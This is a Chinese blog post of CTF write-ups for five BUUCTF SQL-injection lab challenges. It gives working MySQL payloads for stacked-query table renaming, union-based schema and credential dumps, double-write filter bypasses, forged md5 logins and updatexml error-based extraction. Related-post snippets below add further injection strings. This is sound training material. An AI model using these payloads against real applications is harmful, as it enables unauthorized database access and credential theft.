记BUUCTF SQL注入大合集

最新推荐文章于 2024-03-26 12:26:48 发布
最新推荐文章于 2024-03-26 12:26:48 发布
阅读量2.6k 收藏 14
点赞数 4
分类专栏: ctf 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/106489971/
版权

SQL水平太菜了,因此专门复现一轮SQL注入再学习一下。

 

1.强网杯2019随便注

尝试  1 'and '1'='1 成功回显,存在注入点。

但是题目有很强的过滤。

考虑堆叠注入。

由于没有过滤show函数因此可以用其来进行查询一些数据库信息。常见的有

  • show databases                //查询数据库名称
  • show tables / show tables from db_name   //查询(指定数据库)表名
  • show engines               //显示MySQL当前支持哪些存储引擎和默认存储引擎
  • show columns   from table_name   //显示表的列信息
  • show grants for user_name  // 显示用户的权限
  • show privileges   //显示MySQL所支持的所有权限,及权限可操作的对象

多次尝试构造语句

1';show columns from `1919810931114514`;#      发现flag藏在该表

注:因为这里的表名为数字开头所以需要 ` 符号将表名包含,表示该表是表名而不是关键字。

这里由于select都被过滤了,所以有一个骚操作。

1.将words表改名为word1或其它任意名字

2.1919810931114514改名为words

3.将新的word表插入一列,列名为id

4.将flag列改名为data

构造payload:1';rename `words` to `word`; rename `1919810931114514` to `words`; alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#

在buu上测试了半天都不行,😓sql语句时灵时不灵,也是醉了。检查了半天居然时由于大小写问题。

后续发现

payload:1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

因此代码未成功应该时由于表名和列名未用``包括起来导致的。

找了半天wp,发现如下payload可用

payload: 1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100)  NOT NULL;%23

然后输入1' or 1=1;# 即可获取flag

注:这里得varchar(100) not null 中的not null 不能删除 否则会执行失败,具体原理不太明白。

 

2.[极客大挑战 2019]LoveSQL

0202年了,居然还有直接万能密码登录的sql注入题目。

构造

成功登录

除此之外就没有别的东西了,因此注入点应该就在这两个输入框。

构造 admin' order by 3 #  判断表单的列数

发现4时会报错证明表单列数为3。

测试发现2,3列有回显。

注:一些常见的系统函数

     1.VERSION() 查询数据库的版本

     2.DATABASE() 、SCHEMA()  查询数据库名称

     3.USER()、SYSTEM_USER()、SESSION_USER()、CURRENT_USER()、CURRENT_USER 返回当前用户

     4.group_concat(table_name) from information_schema.tables where table_schema= db_name 查询数据库下的所有表名

     5.group_concat(column_name) from information_schema.columns where table_schema=db_name and table_name=t_name 查询数据库下指定表的所有列名

    构造   username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=6833fa82f111ddf6f0cd9da85e903c1f

 

   查询数据库名称

根据数据库查询表单信息,尝试l0ve1ysq1 库

    构造 username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=6833fa82f111ddf6f0cd9da85e903c1f

爆表数据

    构造username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=6833fa82f111ddf6f0cd9da85e903c1f

成功get flag

 

3.[极客大挑战 2019]BabySQL

简单尝试了一下,发现常见的select union or 等 参数都被过滤了。

推测一下可能是通过匹配关键字然后删除来实现过滤。

尝试双写 ,果然没有被过滤。

构造 username=admin' OORRDER bbyy 3 #&password =123 

注: 这里的order by 3是多次尝试出来的,orderby 4时就会报错,因此可以判断表列数有3个

成功登录,但是无回显点。尝试在password处注入。

构造 username=admin&password =123  ' OORRDER bbyy 3 #

成功回显。

然后就是和LoveSQL 那题一模一样的操作了,在需要绕过的地方双写绕过即可,在此就不多赘述了。需要的可以参考上面的那题的写法。在此就简单写一下具体步骤。

1.password=1' ununionion sselectelect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#     //获取数据库名称b4bsql

2.password=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#   //获取列名 (id,username,password)

3.password=1' uniunionon seselectlect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql#

成功getflag

flag{930291ea-1c01-49fa-812c-938011abfda7}

 

4.[GXYCTF2019]BabySQli

进入题目是一个简单的登录界面

fuzz了一下,过滤的并不多,union select 并没有被过滤。

构造user=admin' union select 1,1,1#

尝试一下发现该表单数据共有三列。

因为没限制limit语句,尝试构造user =admin' union select 1,1,1 limit 1,1 #&pw=1

发现无效

注:后续阅读源码发现,这题限制了用户名,只允许admin用户,如果没有该限制,上述语句应该可以生效

if($arr[1] == "admin"){
			if(md5($password) == $arr[2]){
				echo $flag;
			}
			else{
				die("wrong pass!");
			}
		}
		else{
			die("wrong user!");
		}

不过这里也可以利用limit测试出来,只有user=admin时,才会有回显数据。

这里有一个坑,他的数据库里的密码居然时加密,不过通常来说时md5加密。

因此,构造

name=admin' union select 0,'admin','81dc9bdb52d04dc20036dbd8313ed055' limit 1,1%23&pw=1234

成功获取flag

 

5.hardsql

简单测试一下发现各种语句都被过滤了。

百度了一下发现可以通过报错注入的方式

注:报错注入是sql注入的一种常见类型,通过构造特殊的sql语句,让信息以报错的形式显示出来。最常见的就是基于updatexml()和extractvalue()。

 updatexml函数和extractvalue函数

UPDATEXML (XML_document, XPath_string, new_value);

  • 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
  • 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
  • 第三个参数:new_value,String格式,替换查找到的符合条件的数据
  • 作用:改变文档中符合条件的节点的值(改变XML_document中符合XPATH_string的值)

EXTRACTVALUE (XML_document, XPath_string);

  • 这两个参数和上面的意思一样
  • 作用:对XML文档进行查询(查询XML_document中符合XPATH_string的值)

注:1.注入原理:updatexml函数和extractvalue函数的第二个参数XPath_string未满足XPath语法,报错并带出关键信息。

       2.两个函数能查询字符串的最大长度为32。

因此我们可以构造查询语句获取数据库信息

username=admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=1

注:1.之所以选用concat函数是因为updatexml第二个参数要求参数的类型为字符串,因此不能直接执行sql指令,而选择返回值为字符串的concat

        2.concat中的0x7e就是~的16进制,无特殊含义,可以任意替换。

接下来就是常规的注入过程了。

username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like'geek'),0x7e),1))%23&password=1

username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like'H4rDsq1'),0x7e),1))%23&password=1

username=admin'or(updatexml(1,concat(0x7e,(select(group_concat('','',password))from(H4rDsq1)),0x7e),1))%23&password=1

\

由于长度限制,我们可以通过left和right函数分开获取flag(substring被过滤了,不然也可以使用)

or(updatexml(1,concat(0x7e,(select(right(password,25))from(H4rDsq1)),0x7e),1))%23&password=1

flag : flag{3d4c915f-ff1b-461c-8027-782ab72e0740}

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

fly夏天
关注
  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
buu(sql注入)
qq_62046696的博客
08-23 1114
打开界面,我们发现是 admin账号还是monster,这道题肯定与cookie有关,直接在cookie中。列数不对,or也被过滤,大小写,双写都不能绕过,呃呃呃,这样order,information都被过滤了。回显位置,2,3现在我们需要找一个命令替换掉,information.schema_tables,这应该是注入点的位置, 发现# --+被过滤,然后是上传发现,没空格,那就有/**/代替空格。啥都没有,考察cookie用admin登录,都不需要密码,感觉挺离谱的,直接出来试一下monster,..
红队笔9:CTF7打靶流程-sql注入万能密码-密码喷射(vulnhub)
最新发布
qq_63442530的博客
03-26 1168
目录开头:1.主机发现和端口扫描2.攻击优先级分析:3.80端口和8080端口-sql注入万能密码-报错信息泄露目录结构4.提权-寻找敏感信息(登录凭据)5.密码喷射登录ssh6.总结学习的视频是哔哩哔哩红队笔:「红队笔」靶机精讲:LAMPSecurityCTF7 - 字符串魔法、密码喷射,这才是实战技术。_哔哩哔哩_bilibili打靶时参考文章和本文借鉴文章:红队打靶:LampSecurity:CTF7打靶思路详解(vulnhub)_lampsecurityctf-CSDN博客靶机下载链接见:htt
SQL注入buuctf web入门sql注入2)
weixin_44214568的博客
07-13 1833
1.启动靶机: 2.进入login.php界面 ps:界面没有注入口,因为这个题目是sql注入,尝试输入常规的login界面,进入了login界面 我们学习ctf,在基础阶段还是要抛开脑洞,掌握并且形成一套破解模式 3.查看源代码 这个源代码里面有用的信息就是?tips=1,但是加到url后面也没什么效果 4.抓包吧 尝试了一下普通的注入没有啥用 5.先用burpsuit查看数据库 注入语句 1' and updatexml(1,concat(0x7e,(select data
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析)
weixin_66146598的博客
06-09 4685
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析),《从0到1:CTFer成长之路》书籍配套题目之sql注入。1、有的网站会开启错误调试信息方便开发者调试,可以利用报错信息进行报错注入2、updatexml第二个参数应为法XPATH路径,否则会在引发报错的同时输出传入的参数3、dual用于测试数据库是否可以正常使用4、如果没有报错提示,可以bool注入...
BUU SQL COURSE 1
CyhDl666的博客
03-12 3274
进入题目给了两个页面 一开始以为在注入点在登录页面 尝试了万能密码 和 各种闭 没发现注入的方式 接着尝试了热点列表页面的注入 但是url上好像不存在注入 F12在net中找到了隐藏的url 访问content_detail.php?id=1页面构造payload ?id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# # admin、co.
最全干货SQL注入
04-28
SQL注入SQL注入SQL注入SQL注入SQL注入SQL注入SQL注入SQL注入SQL注入SQL注入SQL注入SQL注入SQL注入SQL注入SQL注入SQL...
SQL注入相关英文技术文档
07-23
教程名称:SQL注入相关英文技术文档集课程目录:【】blind-sql-injection-attacks【】from_sql_injection_to_shell【】Hacking_Oracle_From_Web【】PT-devteev-FAST-blind-SQL-Injection【】sql_injection【】sql_...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL 注入天书.pdf
08-06
SQL 注入学习天书
BUUCTF [第一章 web入门]SQL注入-2
qq_45707441的博客
12-22 2345
经分析后可知:当输入admin’ and 1=3# 时返回为假 {“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"} 当输入admin’ and 1=1# 时返回为真{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"} 根据返回的字符串,我们可以写出解决的python脚本 #数据库名字长度 import string import requests url="http://e2cc3e..
Buuctf | BUU SQL COURSE 1
m_de_g的博客
12-27 5722
BUU SQL COURSE 1 一、题目下载 https://buuoj.cn/challenges#BUU%20SQL%20COURSE%201 二、实战化演练 1.直接使用弱口令来进行测试 2.经过多次的测试,都无法注入,说明这个是写死的注册和登录,左边不是有热点吗?查看了一下跳转 3.通过访问backend/content_detail.php?id=1 4.通过修改后面的id=1,2,3,均会返回信息,直接使用SQL查询语句 1 and 1=1 5.我们尝试使用 1 and 1=2
BUUCTF - Web -[web入门]sql 1~2(水题勿览)
1tachi的博客
12-01 1705
《CTFer:从0到1》的两道sql注入(水题勿览) 看到提示,得到闭方式:' 查字段数 order by 3正常回显,order by 4无回显,三个字段 判断回显点 回显点是2、3 注意:当id=3的时候会正常回显,这时会覆盖掉我们查询的数据,所以id=3.1,使正常内容不会显,我们就看到了我们所查询的数据 查表名 ?id=3.1' union select 1,table_name,3 from information
CTF刷题Buuctf-N1BOOK-sql2
m_de_g的博客
06-09 1161
N1BOOK-SQL2 一、解题思路 直接访问,会出现403,难受,再看一下提示:请访问/login.php /user.php http://7496c5f0-0623-4702-951f-b085e8f8cb97.node3.buuoj.cn/user.php http://7496c5f0-0623-4702-951f-b085e8f8cb97.node3.buuoj.cn/login.php 1.养成好习惯,Ctrl + U 查看页面源代码 2.看到提示,那直接按照提示,走一波 3..
[Writeup]BUU SQL COURSE1[入门级]
小飒的博客
06-08 611
观察网址,好像找到注入点 获得数据库 ctftraining获得表名 FLAG_TABLE获得列名 FLAG_COLUMN获得数据时发现数据是空的,只能想另外办法 看能不能登录news的数据库下找到 admin的密码:67fef29ef7beb75f567587f135fa26a0 获得flag payload: 使用sqlmap burp里直接可以找到注入点...
BUUCTF[第一章 web入门]SQL注入-2
hivjianxian的博客
11-22 465
ctf题解
BUUCTF SQL注入1
03-29
这是一道基础的 SQL 注入题目,我们需要在登录页面中注入 SQL 语句来绕过验证,成功登录管理员账号。 首先,我们打开登录页面,输入任意用户名和密码,点击登录,可以看到页面返回了一段 SQL 语句: ``` SELECT * FROM users WHERE username = 'xxx' AND password = 'xxx' ``` 这是一个用于登录验证的 SQL 语句,我们可以通过注入来绕过这个验证。 在用户名和密码处尝试注入,输入 `' or 1=1 --`,点击登录,发现页面跳转到了管理员界面,注入成功。 这个注入语句中,`'` 表示闭了用户名或密码的字符串,`or 1=1` 表示逻辑或,永远为真,`--` 表示 SQL 注释,注释后面的语句。 因此,注入后的 SQL 语句变为: ``` SELECT * FROM users WHERE username = '' or 1=1 --' AND password = '' or 1=1 --' ``` 其中,`--` 后面的语句被注释掉了,因此不会影响 SQL 语句的执行。 最后,我们成功登录了管理员账号,Flag 就在管理员界面上。 注意,这里的注入语句是基于题目情况而定的,实际情况可能会有所不同,需要结实际情况来进行注入。同时,注入操作可能会对系统造成损害,需要谨慎使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值